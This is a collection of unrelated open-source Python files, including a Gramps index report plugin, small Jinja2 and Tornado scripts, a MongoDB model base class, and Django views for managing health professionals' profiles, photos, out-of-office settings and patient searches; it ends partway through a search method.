# Copyright (C) 2012 Nick Hall
# Copyright (C) 2012 Brian G. Matherly
# Copyright (C) 2012-2014 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#------------------------------------------------------------------------
#
# Python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.plug.docgen import (FontStyle, ParagraphStyle, TableStyle,
TableCellStyle, FONT_SANS_SERIF,
IndexMark, INDEX_TYPE_TOC)
#------------------------------------------------------------------------
#
# AlphabeticalIndex
#
#------------------------------------------------------------------------
class AlphabeticalIndex(Report):
    """ Report that produces an alphabetical index for a book. """
    def __init__(self, database, options, user):
        """
        Create the AlphabeticalIndex report object.
        The arguments are:
        database - the Gramps database instance
        options  - instance of the Options class for this report
        user     - a gen.user.User() instance
        """
        Report.__init__(self, database, options, user)
        self._user = user
        trans_option = options.menu.get_option_by_name('trans')
        self.set_locale(trans_option.get_value())

    def write_report(self):
        """ Write the index title and let the backend insert the index. """
        title = self._("Alphabetical Index")
        title_mark = IndexMark(title, INDEX_TYPE_TOC, 1)
        self.doc.start_paragraph("IDX-Title")
        self.doc.write_text('', title_mark)
        self.doc.end_paragraph()
        self.doc.index_title = self._('Index')
        self.doc.insert_index()
#------------------------------------------------------------------------
#
# AlphabeticalIndexOptions
#
#------------------------------------------------------------------------
class AlphabeticalIndexOptions(MenuReportOptions):
    """
    Defines options and provides handling interface.
    """
    def __init__(self, name, dbase):
        self.__db = dbase
        MenuReportOptions.__init__(self, name, dbase)

    def get_subject(self):
        """ Return a string that describes the subject of the report. """
        return _('Entire Book')

    def add_menu_options(self, menu):
        """ Add the options for this report """
        stdoptions.add_localization_option(menu, _("Report Options"))

    def make_default_style(self, default_style):
        """Make the default output style for the AlphabeticalIndex report."""
        # Title paragraph: large sans-serif font.
        title_font = FontStyle()
        title_font.set(face=FONT_SANS_SERIF, size=14)
        title_para = ParagraphStyle()
        title_para.set_font(title_font)
        title_para.set_bottom_margin(0.25)
        title_para.set_description(_('The style used for the title.'))
        default_style.add_paragraph_style("IDX-Title", title_para)

        # Two-column table with an 80/20 width split.
        index_table = TableStyle()
        index_table.set_width(100)
        index_table.set_columns(2)
        index_table.set_column_width(0, 80)
        index_table.set_column_width(1, 20)
        default_style.add_table_style("IDX-Table", index_table)

        default_style.add_cell_style("IDX-Cell", TableCellStyle())

        # Entry paragraph: small sans-serif font.
        entry_font = FontStyle()
        entry_font.set(face=FONT_SANS_SERIF, size=10)
        entry_para = ParagraphStyle()
        entry_para.set_font(entry_font)
        entry_para.set_description(_('The basic style used for the text display.'))
        default_style.add_paragraph_style("IDX-Entry", entry_para)
| SNoiraud/gramps | gramps/plugins/textreport/alphabeticalindex.py | Python | gpl-2.0 | 4,553 |
"""Render the form.html template and print the result.

Uses the print() function form so the script is valid under both
Python 2 and Python 3 (the original 'print expr' statement is a
syntax error on Python 3).
"""
from jinja2 import Environment, FileSystemLoader

loader = FileSystemLoader("webx/templates")
env = Environment(loader=loader)
template = env.get_template('form.html')
print(template.render(the='variables', go='here'))
from BaseModel import BaseModel
import DatabaseLayer
class HabitBaseModel(BaseModel):
    """
    Base class for models stored in MongoDB.

    Construction (by primary key or from a raw document dict) and the
    save-changes logic are the same for every model, so they are
    centralized here instead of being repeated in each subclass.
    """
    @classmethod
    def construct_model_from_pk(cls,pk):
        """
        args:
            pk:
                primary key used to load this model from the database.
        return: an instance of the model on which this is called
        raises: NotImplementedError when the subclass does not declare
            a COLLECTION_NAME in its dbFields.
        """
        if not cls.get_dbFields().COLLECTION_NAME:
            raise NotImplementedError("This needs a collection name to work")
        collection = DatabaseLayer.get_table(cls.get_dbFields().COLLECTION_NAME)
        obj = cls()
        obj.dict = collection.find_one({cls.get_dbFields().PK_KEY:pk})
        return obj

    @classmethod
    def construct_model_from_dict(cls,dict):
        """
        args:
            dict:
                raw document whose fields become the model's properties.
                NOTE(review): the parameter name shadows the builtin
                'dict' inside this method; renaming it would break any
                keyword callers, so it is only flagged here.
        return: an instance of the model on which this is called
        """
        obj = cls()
        obj.dict = dict
        return obj

    def save_changes(self):
        # Update only the tracked changes when the document already has a
        # primary key; otherwise insert the whole document and remember
        # the generated key. The change buffer is cleared afterwards.
        collection = DatabaseLayer.get_table(self.get_dbFields().COLLECTION_NAME)
        if self.get_pk():
            # skip the round-trip when nothing changed
            if self._changes:
                collection.update_one({self.get_dbFields().PK_KEY:self.get_pk()},{'$set':self._changes})
        else:
            pk = collection.insert_one(self.dict).inserted_id
            self.dict[self.get_dbFields().PK_KEY] = pk
        self._changes = {}
| joelliusp/SpaceHabit | SpaceHabitRPG/Models/HabitBaseModel.py | Python | mit | 1,573 |
# Package versioning solution originally found here:
# http://stackoverflow.com/q/458550
# The version lives in its own module so that:
# 1) we don't load dependencies by storing it in __init__.py
# 2) we can import it in setup.py for the same reason
# 3) we can import it into your module
__version__ = '0.3.8'
| tlatzko/spmcluster | .tox/docs/lib/python2.7/site-packages/build/lib/build/lib/build/lib/build/lib/build/lib/build/lib/sphinxcontrib/napoleon/_version.py | Python | bsd-2-clause | 295 |
import sys
from aimes.emgr.utils import *
__author__ = "Matteo Turilli"
__copyright__ = "Copyright 2015, The AIMES Project"
__license__ = "MIT"
# -----------------------------------------------------------------------------
def write_skeleton_conf(cfg, scale, cores, uniformity, fout):
    '''Write a skeleton configuration file with the set number/type/duration
    of tasks and stages.

    cfg        : emgr configuration dict; reads cfg['skeleton_task_duration']
                 ('max', 'avg', 'stdev') and cfg['skeleton_template'].
    scale      : number of tasks, substituted as SCALE.
    cores      : list of cores-per-task values; the last entry is used.
    uniformity : 'uniform' or 'gauss' task-duration distribution.
    fout       : output target forwarded to write_template().

    Exits the process with status 1 on an invalid cores value or
    uniformity. (print() function form fixes the Python2-only
    'print expr' statements, which are syntax errors on Python 3.)
    '''
    substitutes = dict()
    substitutes['SCALE'] = scale
    substitutes['CORES'] = cores[-1]

    if substitutes['CORES'] > 1:
        substitutes['TASK_TYPE'] = 'parallel'
    elif substitutes['CORES'] == 1:
        substitutes['TASK_TYPE'] = 'serial'
    else:
        print("ERROR: invalid number of cores per task: '%s'." % cores)
        sys.exit(1)

    if uniformity == 'uniform':
        substitutes['UNIFORMITY_DURATION'] = "%s %s" % \
            (uniformity, cfg['skeleton_task_duration']['max'])
    elif uniformity == 'gauss':
        # TODO: Calculate stdev and avg.
        substitutes['UNIFORMITY_DURATION'] = "%s [%s, %s]" % \
            (uniformity, cfg['skeleton_task_duration']['avg'],
             cfg['skeleton_task_duration']['stdev'])
    else:
        print("ERROR: invalid task uniformity '%s' specified." % uniformity)
        sys.exit(1)

    write_template(cfg['skeleton_template'], substitutes, fout)
| radical-cybertools/aimes.emgr | src/aimes/emgr/workloads/skeleton.py | Python | mit | 1,336 |
#!/usr/bin/env python
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
    """Handler that answers every GET with a fixed greeting."""
    def get(self):
        greeting = "Hello, world"
        self.write(greeting)
# Route table: everything is served by MainHandler.
routes = [
    (r"/", MainHandler),
]
application = tornado.web.Application(routes)

if __name__ == "__main__":
    # Listen on port 8888 and run until interrupted.
    application.listen(8888)
    tornado.ioloop.IOLoop.instance().start()
| tinyogre/multislash | testserver.py | Python | mit | 337 |
"""
This module contains all the views which are used
by the manager to add/edit healthprofessionals and the
views used by the healthprofessional itselves.
:subtitle:`Class definitions:`
"""
import StringIO
from datetime import date
from django.contrib.auth.decorators import login_required, user_passes_test
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from apps.utils.utils import sent_password_change_request
from apps.healthperson.healthprofessional.forms import\
HealthProfessionalAddForm, HealthProfessionalSearchForm,\
HealthProfessionalEditForm, HealthProfessionalPhotoForm,\
HealthProfessionalNotificationEditForm,\
HealthProfessionalOutOfOfficeEditForm
from apps.account.forms import SetPasswordForm
from apps.healthperson.healthprofessional.models import HealthProfessional
from apps.questionnaire.models import QuestionnaireRequest
from django.utils.translation import ugettext as _
from PIL import Image
from django.contrib.auth.models import Group
from apps.account.models import User
from core.encryption.random import randomkey
from django.db.models import Q
from dateutil import parser
from apps.healthperson.utils import is_allowed_healthprofessional,\
is_allowed_manager, is_allowed_manager_and_healthprofessional, login_url
from apps.rcmessages.views import get_all_messages_for_healthprofessional
from django.core.files.uploadedfile import InMemoryUploadedFile
from apps.base.views import BaseIndexTemplateView
from django.views.generic.base import View, TemplateView
from django.utils.decorators import method_decorator
from core.views import FormView
from apps.healthperson.views import BaseAddView
from django.http import Http404
# Target dimensions (in pixels) for healthprofessional profile photos;
# used by the upload/resize/crop views below.
PHOTO_WIDTH = 133
PHOTO_HEIGHT = 165
class HealthProfessionalBaseView(View):
    """
    Base view which adds the healthprofessional by
    using the healthprofessional_session_id
    or logged in user
    """
    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        """Adds healthprofessional to the view class.

        When a 'healthprofessional_session_id' URL kwarg is present, it
        must map to a session entry of the form
        'storage_<healthperson_ptr_id>' (as written by
        HealthProfessionalAddView); otherwise the logged-in user's own
        healthperson is used. Raises Http404 for unknown session keys
        or ids.
        """
        if 'healthprofessional_session_id' in kwargs:
            healthprofessional_session_id = kwargs.get(
                'healthprofessional_session_id')
            if healthprofessional_session_id not in self.request.session:
                raise Http404
            # strip the 8-character 'storage_' prefix to recover the id
            healthperson_ptr_id =\
                self.request.session[healthprofessional_session_id][8:]
            try:
                self.healthprofessional =\
                    HealthProfessional.objects.select_related(
                        'user__personal_encryption_key').get(
                        healthperson_ptr_id=healthperson_ptr_id)
            except HealthProfessional.DoesNotExist:
                raise Http404
        else:
            # set healthprofessional to self.
            self.healthprofessional = self.request.user.healthperson
        return super(
            HealthProfessionalBaseView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        """Base context, include the healthprofessional by default"""
        context = super(HealthProfessionalBaseView,
                        self).get_context_data(**kwargs)
        context.update({'healthprofessional': self.healthprofessional})
        # 'submenu' is an optional class attribute on subclasses
        if hasattr(self, 'submenu'):
            context.update({'submenu': self.submenu})
        return context
class HealthProfessionalIndexView(BaseIndexTemplateView,
                                  HealthProfessionalBaseView):
    """
    This view shows the homepage of the healthprofessional
    """
    template_name = 'healthprofessional/index.html'

    def get_controles_for_healthprofessional(self, healthprofessional):
        """
        Collect the finished-but-unhandled controles for the given
        healthprofessional and split them into regular and urgent ones.

        Stores the result on self.controles / self.urgent_patient_controles
        and also returns [controles, urgent_patient_controles].

        BUGFIX: this method previously returned None, which broke the
        two-value unpacking in get_context_data when gathering controles
        for out-of-office replacements.

        Args:
            - healthprofessional: The healthprofessional to get all\
            controles for
        """
        # Controles where this healthprofessional is the practitioner or
        # the appointment healthprofessional, and that are finished.
        controle_filter_base = (Q(
            practitioner=healthprofessional) |
            Q(appointment__appointment_healthprofessional=healthprofessional))
        controle_filter_base = controle_filter_base & Q(
            finished_on__isnull=False)

        # Re-add controles after handling but still appointment_needed with:
        # | (Q(appointment_needed = True) &
        #    Q(appointment_added_on__isnull = True))
        extra_filter_base = Q(handled_on__isnull=True)

        # Show (urgent) controles which are finished & (not handled)
        controle_filter = controle_filter_base & (extra_filter_base)

        controles = QuestionnaireRequest.objects.filter(
            controle_filter).order_by('-finished_on')

        self.urgent_patient_controles = []
        self.controles = []
        for controle in controles:
            if controle.urgent:
                self.urgent_patient_controles.append(controle)
            else:
                self.controles.append(controle)
        return [self.controles, self.urgent_patient_controles]

    def get_context_data(self, **kwargs):
        """Build the homepage context: own controles, controles of
        healthprofessionals this user is currently replacing, and the
        latest message (if any)."""
        context = super(HealthProfessionalIndexView,
                        self).get_context_data(**kwargs)
        self.get_controles_for_healthprofessional(self.healthprofessional)
        controles = list(self.controles)
        urgent_patient_controles = list(self.urgent_patient_controles)
        # Add controles from healthprofessionals for which
        # the logged-in healthprofessional is the replacement.
        for hp_to_replace in self.healthprofessional.replacement_set.all():
            if ((hp_to_replace.out_of_office_start <= date.today() and
                 hp_to_replace.out_of_office_end >= date.today())):
                [extra_controles, extra_urgent_patient_controles] =\
                    self.get_controles_for_healthprofessional(hp_to_replace)
                for extra_controle in extra_controles:
                    if extra_controle not in controles:
                        controles.append(extra_controle)
                temp_controles = extra_urgent_patient_controles
                for extra_urgent_patient_controle in temp_controles:
                    if ((extra_urgent_patient_controle not in
                         urgent_patient_controles)):
                        urgent_patient_controles.append(
                            extra_urgent_patient_controle)
        # latest message, or None when the healthprofessional has none
        try:
            message = get_all_messages_for_healthprofessional(
                self.healthprofessional)[0]
        except IndexError:
            message = None
        context.update({'message': message,
                        'controles': controles,
                        'urgent_patient_controles': urgent_patient_controles,
                        'healthprofessional': self.healthprofessional})
        return context
class SearchView(TemplateView):
    """Generic patient search page as available in the homepage.

    POSTed 'searchterm' is matched against HMAC-indexed last name,
    first name, BSN, and (when it parses as a date) date of birth.
    """
    template_name = 'healthprofessional/search_index.html'
    @method_decorator(login_required)
    @method_decorator(user_passes_test(
        is_allowed_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        """Init default values to be used in the context"""
        self.patients = []
        self.no_search_term = False
        return super(SearchView, self).dispatch(*args, **kwargs)
    def post(self, request, *args, **kwargs):
        """Search for patients matching the submitted search term."""
        if 'searchterm' in request.POST:
            patients = []
            searchterm = request.POST['searchterm']
            if searchterm not in (None, ''):
                # Build up search filter for persons: only non-deleted
                # patients of the requesting user's hospital
                hospital = request.user.hospital
                user_filter = Q(groups__name='patients') &\
                    Q(hospital=hospital) & Q(deleted_on__isnull=True)
                user_filter2 = Q(hmac_last_name=searchterm)
                user_filter2 = user_filter2 | Q(
                    hmac_first_name=searchterm)
                user_filter2 = user_filter2 | Q(
                    hmac_BSN=searchterm)
                # try parsing the filled in searchterm to a date,
                # if failed don't include it.
                # NOTE(review): local 'date' shadows the datetime.date
                # imported at module level (method-local only).
                try:
                    date = parser.parse(searchterm, dayfirst=True)
                except (ValueError, TypeError):
                    date = None
                if date:
                    user_filter2 = user_filter2 | Q(date_of_birth=date)
                user_filter = user_filter & user_filter2
                # Execute filter
                users = User.objects.filter(user_filter)
                patients = [user.healthperson for user in users]
            else:
                # empty term: show the "no search term" notice instead
                self.no_search_term = True
            self.patients = patients
        return self.get(request, *args, **kwargs)
    def get_context_data(self, **kwargs):
        """Return the found patients in a context"""
        context = super(SearchView, self).get_context_data(**kwargs)
        context.update({'patients': self.patients,
                        'no_search_term': self.no_search_term})
        return context
class HealthProfessionalCropPhoto(HealthProfessionalBaseView, TemplateView):
    """
    View allows to crop the photo of the healthprofessional, if necessary.
    """
    template_name = 'healthprofessional/photo_crop.html'
    submenu = 'photo'
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        return super(HealthProfessionalCropPhoto,
                     self).dispatch(*args, **kwargs)
    def post(self, request, *args, **kwargs):
        """Crop the stored photo to PHOTO_WIDTH x PHOTO_HEIGHT.

        Expects 'x1'/'y1' POST parameters as the top-left crop offset
        (integers, as submitted by the crop template). The cropped image
        is saved under a fresh random name and the old file is removed.
        """
        self.healthprofessional.photo_location.open('r')
        image_file = self.healthprofessional.photo_location._file
        image = Image.open(image_file.file)
        x_offset = int(request.POST['x1'])
        y_offset = int(request.POST['y1'])
        # crop image to the fixed target size, starting at the offset
        image = image.crop(
            (x_offset, y_offset,
             x_offset + PHOTO_WIDTH, y_offset + PHOTO_HEIGHT))
        # Save in memory temporarily to change photo name
        image_io = StringIO.StringIO()
        image.save(image_io, 'PNG', quality=100)
        image_file = InMemoryUploadedFile(
            image_io, None,
            self.healthprofessional.photo_location.name,
            'image/png', image_io.len, None)
        # Remove old file, save new file & update field
        self.healthprofessional.photo_location.delete()
        self.healthprofessional.photo_location.save(
            User.objects.make_random_password(length=10) + '.png', image_file)
        # release the in-memory image data
        image_file = None
        image = None
        image_io = None
        return HttpResponseRedirect(reverse(
            'healthprofessional_view_photo',
            args=(self.kwargs.get('healthprofessional_session_id'),)))
class HealthProfessionalEditPhoto(HealthProfessionalBaseView, FormView):
    """
    Add/edit or remove the photo of an healthprofessional.

    Uploaded photos are validated against the minimum size, resized to
    cover PHOTO_WIDTH x PHOTO_HEIGHT while keeping aspect ratio, and
    sent to the crop view when one dimension still exceeds the target.
    """
    template_name = 'healthprofessional/edit_view.html'
    form_class = HealthProfessionalPhotoForm
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        self.photo_error = None
        self.success_url = reverse(
            'healthprofessional_view_photo',
            args=(self.kwargs.get('healthprofessional_session_id'),))
        return super(HealthProfessionalEditPhoto,
                     self).dispatch(*args, **kwargs)
    def get_form_kwargs(self):
        # bind the form to this healthprofessional instance
        kwargs = super(HealthProfessionalEditPhoto, self).get_form_kwargs()
        kwargs.update({'instance': self.healthprofessional})
        return kwargs
    def get_context_data(self, **kwargs):
        context = super(HealthProfessionalEditPhoto,
                        self).get_context_data(**kwargs)
        context.update({'cancel_url': self.success_url, 'upload_photo': True,
                        'section': _('Behandelaar pasfoto')})
        return context
    def resize_photo(self, image):
        """Scale the image (keeping aspect ratio) so that it covers the
        PHOTO_WIDTH x PHOTO_HEIGHT target: the smaller-ratio axis is set
        exactly to its target size, the other may end up larger."""
        x_ratio = float(image.size[0]) / PHOTO_WIDTH
        y_ratio = float(image.size[1]) / PHOTO_HEIGHT
        if y_ratio > x_ratio:
            new_y = int(float(image.size[1]) / x_ratio)
            new_x = PHOTO_WIDTH
        else:
            new_y = PHOTO_HEIGHT
            new_x = int(float(image.size[0]) / y_ratio)
        image = image.resize((new_x, new_y))
        return image
    def form_valid(self, form):
        """Validate/resize the uploaded photo, or just save when the
        photo was removed/left unchanged. Redirects to the crop view
        when the resized image still needs cropping."""
        healthprofessional = form.save(commit=False)
        photo_error = None
        # check size and if to large resize
        image_file = healthprofessional.photo_location._file
        if image_file:
            image = Image.open(image_file.file)
            # reject photos smaller than the target in either dimension
            if image.size[0] < PHOTO_WIDTH or image.size[1] < PHOTO_HEIGHT:
                photo_error = _('Pasfoto is te klein, minimaal: ') +\
                    str(PHOTO_WIDTH) + 'x' + str(PHOTO_HEIGHT) + 'px'
            if not photo_error:
                if ((image.size[0] != PHOTO_WIDTH and
                     image.size[1] != PHOTO_HEIGHT)):
                    # neither dimension matches: resize to cover target
                    image = self.resize_photo(image)
                    image_file = StringIO.StringIO()
                    image.save(image_file, 'PNG', quality=100)
                    healthprofessional.photo_location._file.file = image_file
                    healthprofessional.photo_location.name =\
                        User.objects.make_random_password(length=10) + '.png'
                    healthprofessional.save()
                    if ((image.size[0] != PHOTO_WIDTH or
                         image.size[1] != PHOTO_HEIGHT)):
                        # still not perfect.. need to crop
                        crop_url = reverse(
                            'healthprofessional_crop_photo',
                            args=(self.kwargs.get(
                                'healthprofessional_session_id'),))
                        return HttpResponseRedirect(crop_url)
                    else:
                        return super(HealthProfessionalEditPhoto,
                                     self).form_valid(form)
                else:
                    # at least one dimension already matches: re-save as
                    # PNG under a fresh random name
                    image_file = StringIO.StringIO()
                    image.save(image_file, 'PNG', quality=100)
                    healthprofessional.photo_location._file.file = image_file
                    healthprofessional.photo_location.name =\
                        User.objects.make_random_password(length=10) + '.png'
                    healthprofessional.save()
                    return super(HealthProfessionalEditPhoto,
                                 self).form_valid(form)
            else:
                form.errors['photo_location'] = photo_error
                return self.form_invalid(form)
        else:
            # done nothing or remove..
            healthprofessional.save()
            return super(HealthProfessionalEditPhoto, self).form_valid(form)
class HealthProfessionalPhotoView(HealthProfessionalBaseView, TemplateView):
    """
    Display the photo page of a healthprofessional.
    """
    template_name = 'healthprofessional/photo_view.html'
    submenu = 'photo'

    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # access restricted to managers and healthprofessionals
        parent = super(HealthProfessionalPhotoView, self)
        return parent.dispatch(*args, **kwargs)
class HealthProfessionalNotificationView(HealthProfessionalBaseView,
                                         TemplateView):
    """
    Display the notification settings of a healthprofessional.
    """
    template_name = 'healthprofessional/notification_view.html'
    submenu = 'notification'

    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        parent = super(HealthProfessionalNotificationView, self)
        return parent.dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        # no extra context beyond what the base view already provides
        return super(HealthProfessionalNotificationView,
                     self).get_context_data(**kwargs)
class HealthProfessionalOutOfOfficeView(HealthProfessionalBaseView,
                                        TemplateView):
    """
    Display the out-of-office settings of a healthprofessional.
    """
    template_name = 'healthprofessional/out_of_office_view.html'
    submenu = 'out_of_office'

    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        parent = super(HealthProfessionalOutOfOfficeView, self)
        return parent.dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        # no extra context beyond what the base view already provides
        return super(HealthProfessionalOutOfOfficeView,
                     self).get_context_data(**kwargs)
class HealthProfessionalOutOfOfficeEdit(HealthProfessionalBaseView,
                                        FormView):
    """
    Edit the out of office settings for an healthprofessional.
    These settings are used to configure an out of office period
    with a replacement.
    """
    template_name = 'healthprofessional/edit_view.html'
    form_class = HealthProfessionalOutOfOfficeEditForm
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # redirect back to the read-only view after a successful save
        self.success_url = reverse(
            'healthprofessional_view_out_of_office',
            args=(self.kwargs.get('healthprofessional_session_id'),))
        return super(HealthProfessionalOutOfOfficeEdit,
                     self).dispatch(*args, **kwargs)
    def get_form_kwargs(self):
        # bind the form to this healthprofessional instance
        kwargs = super(HealthProfessionalOutOfOfficeEdit,
                       self).get_form_kwargs()
        kwargs.update({'instance': self.healthprofessional})
        return kwargs
    def get_context_data(self, **kwargs):
        # the success URL doubles as the cancel target of the form
        context = super(HealthProfessionalOutOfOfficeEdit,
                        self).get_context_data(**kwargs)
        context.update({'cancel_url': self.success_url,
                        'section': _('Afwezigheid')})
        return context
    def form_valid(self, form):
        """Persist the edited out-of-office settings."""
        healthprofessional = form.save(commit=False)
        healthprofessional.save()
        return super(HealthProfessionalOutOfOfficeEdit,
                     self).form_valid(form)
class HealthProfessionalNotificationEdit(HealthProfessionalBaseView, FormView):
    """
    Edit the notification settings for an healthprofessional.
    These settings are used for sending notifications of unhandeld
    (urgent) controls.
    """
    template_name = 'healthprofessional/edit_view.html'
    form_class = HealthProfessionalNotificationEditForm

    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        session_key = self.kwargs.get('healthprofessional_session_id')
        self.success_url = reverse(
            'healthprofessional_view_notification', args=(session_key,))
        parent = super(HealthProfessionalNotificationEdit, self)
        return parent.dispatch(*args, **kwargs)

    def get_form_kwargs(self):
        # bind the form to this healthprofessional instance
        form_kwargs = super(HealthProfessionalNotificationEdit,
                            self).get_form_kwargs()
        form_kwargs['instance'] = self.healthprofessional
        return form_kwargs

    def get_context_data(self, **kwargs):
        context = super(HealthProfessionalNotificationEdit,
                        self).get_context_data(**kwargs)
        context['cancel_url'] = self.success_url
        context['section'] = _('Notificatie instellingen')
        return context

    def form_valid(self, form):
        professional = form.save(commit=False)
        professional.save()
        return super(HealthProfessionalNotificationEdit, self).form_valid(form)
class HealthProfessionalPersonaliaView(HealthProfessionalBaseView,
                                       TemplateView):
    """
    Shows the personalia of a healthprofessional, which is the information
    stored in the coupled :class:`apps.account.models.User` instance.
    """
    template_name = 'healthprofessional/personalia_view.html'
    submenu = 'personalia'
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # access restricted to managers and healthprofessionals
        return super(HealthProfessionalPersonaliaView,
                     self).dispatch(*args, **kwargs)
class HealthProfessionalSetPassword(HealthProfessionalBaseView, FormView):
    """
    Displays a form to set a password. Used to initialize the password
    for a healthprofessional that has none yet.
    """
    template_name = 'healthprofessional/edit_view.html'
    form_class = SetPasswordForm
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # redirect target after saving comes from the session
        # (set by whichever view sent the user here)
        self.success_url = self.request.session.get('next_url', None)
        return super(HealthProfessionalSetPassword,
                     self).dispatch(*args, **kwargs)
    def get_form_kwargs(self):
        # the form validates against this specific user account
        kwargs = super(
            HealthProfessionalSetPassword, self).get_form_kwargs()
        kwargs.update({'user': self.healthprofessional.user})
        return kwargs
    def get_context_data(self, **kwargs):
        context = super(HealthProfessionalSetPassword,
                        self).get_context_data(**kwargs)
        context.update({'cancel_url': self.success_url,
                        'section': _('Zet wachtwoord'),
                        'extra_info': _('U heeft nog geen wachtwoord ingesteld voor RemoteCare. ' +\
                            'Geef deze hieronder op om (ook) direct in RemoteCare te kunnen inloggen.')})
        return context
    def form_valid(self, form):
        """Store the new password on the coupled user account."""
        user = self.healthprofessional.user
        user.set_password(form.cleaned_data['password'])
        # save user
        user.save()
        return super(HealthProfessionalSetPassword, self).form_valid(form)
class HealthProfessionalPersonaliaEdit(HealthProfessionalBaseView, FormView):
    """
    Edit the personalia of a healthprofessional, which is the information
    stored in the coupled :class:`apps.account.models.User` instance.
    """
    template_name = 'healthprofessional/edit_view.html'
    form_class = HealthProfessionalEditForm
    @method_decorator(user_passes_test(
        is_allowed_manager_and_healthprofessional, login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # redirect back to the read-only personalia page on success
        self.success_url = reverse(
            'healthprofessional_view_personalia',
            args=(self.kwargs.get('healthprofessional_session_id'),))
        return super(HealthProfessionalPersonaliaEdit,
                     self).dispatch(*args, **kwargs)
    def get_form_kwargs(self):
        # the form edits the coupled User instance
        kwargs = super(
            HealthProfessionalPersonaliaEdit, self).get_form_kwargs()
        kwargs.update({'instance': self.healthprofessional.user})
        return kwargs
    def get_context_data(self, **kwargs):
        context = super(HealthProfessionalPersonaliaEdit,
                        self).get_context_data(**kwargs)
        context.update({'cancel_url': self.success_url,
                        'section': _('Personalia & Account')})
        return context
    def form_valid(self, form):
        """Save the user data and copy the professional fields over to
        the healthprofessional record."""
        user = form.save(commit=False)
        # Change password (optional); must happen before user.save()
        if form.cleaned_data['change_password'] == 'yes':
            user.set_password(form.cleaned_data['password'])
        # save user
        user.save()
        self.healthprofessional.function = form.cleaned_data['function']
        self.healthprofessional.specialism = form.cleaned_data['specialism']
        self.healthprofessional.telephone = form.cleaned_data['telephone']
        self.healthprofessional.save()
        return super(HealthProfessionalPersonaliaEdit, self).form_valid(form)
class HealthProfessionalSearchView(FormView):
    """
    Search for an healthprofessional as a manager.

    The submitted form data is kept in the session ('last_search') so
    the search can be re-executed when the user returns via the back
    link (?back=...).
    """
    template_name = 'healthprofessional/search.html'
    form_class = HealthProfessionalSearchForm
    @method_decorator(login_required)
    @method_decorator(user_passes_test(is_allowed_manager,
                                       login_url=login_url))
    def dispatch(self, *args, **kwargs):
        # defaults shown before any search has been performed
        self.has_searched = False
        self.healthprofessionals = None
        return super(HealthProfessionalSearchView,
                     self).dispatch(*args, **kwargs)
    def get_context_data(self, **kwargs):
        """Add the search results to the context"""
        context = super(HealthProfessionalSearchView,
                        self).get_context_data(**kwargs)
        context.update({'healthprofessionals': self.healthprofessionals,
                        'has_searched': self.has_searched})
        return context
    def get_initial(self):
        """
        Get initial data, used for showing the old results
        and form data when
        the user uses the back button to return to the form
        """
        if (('last_search' in self.request.session and
             'back' in self.request.GET)):
            return self.request.session['last_search']
        return None
    def get(self, request, *args, **kwargs):
        """Re-execute the search if the user has used the back button"""
        if 'last_search' in request.session and 'back' in request.GET:
            form_class = self.get_form_class()
            form = form_class(request.session['last_search'])
            if form.is_valid():
                self.form_valid(form)
        return super(HealthProfessionalSearchView,
                     self).get(request, *args, **kwargs)
    def form_valid(self, form):
        """Perform the search action, search for a healthprofessional.

        Only runs the query when at least one of the form fields was
        filled in (filter_valid); otherwise the result stays None.
        """
        self.has_searched = True
        filter_valid = False
        healthprofessionals = None
        # Build up search filter for persons: non-deleted
        # healthprofessionals of the manager's hospital
        hospital = self.request.user.hospital
        user_filter = Q(groups__name='healthprofessionals') &\
            Q(hospital=hospital) & Q(deleted_on__isnull=True)
        if form.cleaned_data['last_name'] not in ('', None):
            user_filter = user_filter & Q(
                hmac_last_name=form.cleaned_data['last_name'])
            filter_valid = True
        if form.cleaned_data['first_name'] not in ('', None):
            user_filter = user_filter & Q(
                hmac_first_name=form.cleaned_data['first_name'])
            filter_valid = True
        if form.cleaned_data['function'] not in ('', None):
            function = form.cleaned_data['function']
            user_filter = user_filter &\
                Q(healthperson__healthprofessional__function=function)
            filter_valid = True
        if form.cleaned_data['specialism'] not in ('', None):
            specialism = form.cleaned_data['specialism']
            user_filter = user_filter &\
                Q(healthperson__healthprofessional__specialism=specialism)
            filter_valid = True
        if filter_valid:
            # Execute filter
            users = User.objects.filter(user_filter)
